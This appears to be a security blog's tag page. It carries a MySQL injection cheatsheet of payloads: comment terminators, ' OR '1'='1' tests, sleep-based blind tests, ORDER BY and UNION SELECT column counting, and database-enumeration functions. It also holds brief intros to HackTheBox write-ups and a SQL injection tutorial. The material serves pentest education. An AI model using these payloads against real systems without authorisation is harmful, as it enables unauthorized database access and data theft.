Sql Injection on Welcome to noobsec

MySQL Injection Cheatsheet

Wed, 29 Jul 2020 13:10:00 +0000

MySQL Injection cheatsheet

Testing checklist

Name	Character	Function
Single quote	`'`	String terminator
Semi colon	`;`	Query terminator
Comment	`-- -`	Removes the rest of the query
Comment	`#`	Removes the rest of the query
Comment	`/comment this/`	Can be placed anywhere in a query, used for bypassing weak filters
Single quote with a comment	`'-- -`	End a string and remove rest of the query
Single quote, semi colon and a comment	`';-- -`	End a string, end query, and remove rest of the query
OR operator	`OR 1=1-- -`	For integers, `true` test
OR operator	`OR 1=2-- -`	For integers, `false` test
OR operator	`' OR '1'='1'-- -`	For strings, `test` test
AND operator	`AND 1=1-- -`	For integers, `true` test
AND operator	`AND 1=2-- -`	For integers, `false` test
AND operator	`' AND '1'='1'-- -`	For strings, `true` test
Arithmetic	`?id=2-1`	For integers, arithmetic operation would load the resultant post
Sleep function	`OR sleep(5)-- -`	Blind test

Functions

Function	Description
`database()`	Get the name of the working database
`user()`	Get the name of the user operating on the working database
`version()`	MySQL version
`concat()`	Concatenate two or more strings per row
`group_concat()`	Concatenate all the strings in one row
`substring('string'/<column_name>,<offset>,<length>)`	Get a part of the value of a string or column
`ord()`	Convert the value to ordinal (decimal)

Number of Columns

Method	Description
`ORDER BY 3-- -`	For numbers. If column index provided exceeds the number of column present in the table, there will be an error
`' ORDER BY 3-- -`	For string. If column index provided exceeds the number of column present in the table, there will be an error
`UNION SELECT 1,2,3-- -`	For numbers. It will throw an error till right number of columns haven’t been “SELECT"ed

Database Contents

Works with UNION queries

HackTheBox - Falafel Writeup w/o Metasploit

Sat, 18 Jul 2020 14:46:16 +0000

HackTheBox - Falafel Writeup w/o Metasploit

Introduction

Falafel is a retired HackTheBox machine and one of the most interesting machines I have hacked on the platform. It is a Linux machine with some really fun vulnerabilities to exploit. The machine is rated hard but the author was kind enough to give us hints as we hack through it. The machine requires you to know a range of nuances from SQLi to Linux filesystems. Let’s jump right in.

HackTheBox - Cronos Writeup w/o Metasploit

Tue, 07 Jul 2020 01:43:22 +0000

HackTheBox - Cronos Writeup w/o Metasploit

Introduction

Cronos is a HackTheBox retired machine. It is a Linux box, and has been officially rated as medium in difficulty, although I feel the machine is quite easy. Let’s jump in.

SQL Injection - 0x01

Fri, 03 Jul 2020 16:22:37 +0000

SQL Injection 0x01

Hi, welcome to the first post of the SQL injection series. Before we dive into the “injection” part of it, let’s first understand the basics of what SQL is and the usual structure of a database-driven system.